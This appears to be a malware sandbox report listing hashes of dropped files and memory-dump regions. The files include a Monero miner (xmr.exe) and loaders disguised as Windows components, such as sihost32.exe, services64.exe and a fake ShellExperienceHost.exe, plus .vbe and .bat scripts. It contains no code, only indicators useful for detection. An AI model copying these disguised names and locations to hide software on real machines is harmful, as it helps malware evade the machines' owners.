SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\5R3FFGftzpp.vbe
MD5
cb60c41590dc32740e8923ba0cb6df97

SHA1
aabc007b611df20e79fceee539ef63e7f2754304

SHA256
c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2

SHA512
a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

Download Submit
C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
MD5
7245c594f9448bae4a79764fb6897e25

SHA1
1eb300765111494f6c7049b5abbbb0e5725b39aa

SHA256
4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5

SHA512
26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
memory/8-144-0x0000000000000000-mapping.dmp

Download
memory/60-141-0x0000000000000000-mapping.dmp

Download
memory/64-216-0x0000000000000000-mapping.dmp

Download
memory/740-165-0x0000000000000000-mapping.dmp

Download
memory/768-139-0x0000000000000000-mapping.dmp

Download
memory/964-224-0x0000000001080000-0x00000000010A0000-memory.dmp

Filesize
128KB

Download
memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/964-223-0x00000001402EB66C-mapping.dmp

Download
memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/964-228-0x00000000010B0000-0x00000000010D0000-memory.dmp

Filesize
128KB

Download
memory/964-229-0x00000000010E0000-0x0000000001100000-memory.dmp

Filesize
128KB

Download
memory/1052-157-0x0000000000000000-mapping.dmp

Download
memory/1524-212-0x0000000000D20000-0x0000000000D21000-memory.dmp

Filesize
4KB

Download
memory/1524-207-0x0000000000000000-mapping.dmp

Download
memory/1524-221-0x00000000033C0000-0x00000000033C2000-memory.dmp

Filesize
8KB

Download
memory/1524-132-0x0000000000000000-mapping.dmp

Download
memory/1540-187-0x0000000000000000-mapping.dmp

Download
memory/1968-168-0x0000000000000000-mapping.dmp

Download
memory/2084-143-0x0000000000000000-mapping.dmp

Download
memory/2204-167-0x0000000000000000-mapping.dmp

Download
memory/2208-138-0x000000001BAA0000-0x000000001BAA2000-memory.dmp

Filesize
8KB

Download
memory/2208-136-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/2208-133-0x0000000000000000-mapping.dmp

Download
memory/2288-204-0x0000000000000000-mapping.dmp

Download
memory/2288-156-0x0000000000000000-mapping.dmp

Download
memory/2392-184-0x0000000000000000-mapping.dmp

Download
memory/2412-174-0x0000000001700000-0x0000000001702000-memory.dmp

Filesize
8KB

Download
memory/2412-169-0x0000000000000000-mapping.dmp

Download
memory/2412-176-0x00000000016E0000-0x00000000016E2000-memory.dmp

Filesize
8KB

Download
memory/2412-177-0x0000000001710000-0x0000000001712000-memory.dmp

Filesize
8KB

Download
memory/2412-178-0x000000001D000000-0x000000001D001000-memory.dmp

Filesize
4KB

Download
memory/2412-179-0x000000001E5B0000-0x000000001E5B1000-memory.dmp

Filesize
4KB

Download
memory/2412-175-0x0000000003160000-0x0000000003165000-memory.dmp

Filesize
20KB

Download
memory/2412-153-0x0000000000000000-mapping.dmp

Download
memory/2420-185-0x0000000000000000-mapping.dmp

Download
memory/2428-152-0x0000000000000000-mapping.dmp

Download
memory/2660-164-0x0000000000000000-mapping.dmp

Download
memory/2740-166-0x0000000000000000-mapping.dmp

Download
memory/2740-142-0x0000000000000000-mapping.dmp

Download
memory/2836-213-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/2836-206-0x0000000000000000-mapping.dmp

Download
memory/2836-220-0x00000000018B0000-0x00000000018B2000-memory.dmp

Filesize
8KB

Download
memory/2844-181-0x0000000001230000-0x0000000001239000-memory.dmp

Filesize
36KB

Download
memory/2844-189-0x000000001C790000-0x000000001C792000-memory.dmp

Filesize
8KB

Download
memory/2844-118-0x0000000000000000-mapping.dmp

Download
memory/2844-183-0x0000000001260000-0x0000000001261000-memory.dmp

Filesize
4KB

Download
memory/2844-126-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/2888-154-0x0000000000000000-mapping.dmp

Download
memory/2888-190-0x0000000000000000-mapping.dmp

Download
memory/2888-219-0x000000001CC20000-0x000000001CC22000-memory.dmp

Filesize
8KB

Download
memory/3064-114-0x0000000000000000-mapping.dmp

Download
memory/3204-186-0x0000000000000000-mapping.dmp

Download
memory/3204-205-0x0000000000000000-mapping.dmp

Download
memory/3204-155-0x0000000000000000-mapping.dmp

Download
memory/3304-151-0x0000000000000000-mapping.dmp

Download
memory/3588-188-0x000000001CC40000-0x000000001CC42000-memory.dmp

Filesize
8KB

Download
memory/3588-115-0x0000000000000000-mapping.dmp

Download
memory/3588-122-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/3588-180-0x0000000000EB0000-0x0000000000EB6000-memory.dmp

Filesize
24KB

Download
memory/3960-218-0x000000001D2B0000-0x000000001D2B2000-memory.dmp

Filesize
8KB

Download
memory/3960-191-0x0000000000000000-mapping.dmp

Download
memory/3960-158-0x0000000000000000-mapping.dmp

Download
memory/3960-162-0x000000001B370000-0x000000001B372000-memory.dmp

Filesize
8KB

Download
memory/3964-129-0x0000000000000000-mapping.dmp

Download
memory/3984-140-0x0000000000000000-mapping.dmp

Download
memory/4012-163-0x0000000000000000-mapping.dmp

Download
memory/4044-150-0x000000001B870000-0x000000001B872000-memory.dmp

Filesize
8KB

Download
memory/4044-145-0x0000000000000000-mapping.dmp

Download
memory/4044-217-0x0000000000000000-mapping.dmp

Download